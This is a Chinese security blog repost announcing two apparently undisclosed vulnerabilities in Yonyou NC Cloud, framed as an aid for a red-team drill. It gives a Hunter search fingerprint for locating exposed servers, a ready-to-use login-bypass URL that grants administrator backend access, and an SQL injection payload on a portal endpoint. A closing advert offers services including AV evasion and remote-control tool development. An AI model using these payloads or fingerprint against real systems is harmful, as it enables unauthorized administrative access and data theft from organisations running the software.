未公开漏洞情报|用友NC Cloud 0Day漏洞

admin 2024年8月30日13:45:37评论108 views字数 401阅读1分20秒阅读模式

0x01 前言

目前是有两个漏洞,一个是SQL注入漏洞一个是登录绕过漏洞,助力第二阶段0Day演练。

Hunter指纹: web.icon=="a5dccf6af79f420f7ea2f2becb6fafa5"

0x02 登录绕过漏洞

Payload: mp/loginxietong?username=admin

输入Payload后直接访问/mp即可进入管理员后台

未公开漏洞情报|用友NC Cloud 0Day漏洞

##0x03 SQL注入漏洞

Payload: portal/pt/PaWfm/open?pageId=login&proDefPk=1*
未公开漏洞情报|用友NC Cloud 0Day漏洞
未公开漏洞情报|用友NC Cloud 0Day漏洞

0x03 结尾

承接红蓝对抗、安全众测、安全培训、CTF代打、CTF培训、PHP / JAVA / GO / Python 代码审计、渗透测试、应急响应、免杀/远控开发、二进制漏洞挖掘、Web3安全服务、智能合约代码审计 等等的安全项目,请联系下方微信。

原文始发于微信公众号(不懂安全的校长):未公开漏洞情报|用友NC Cloud 0Day漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月30日13:45:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   未公开漏洞情报|用友NC Cloud 0Day漏洞https://cn-sec.com/archives/3112686.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息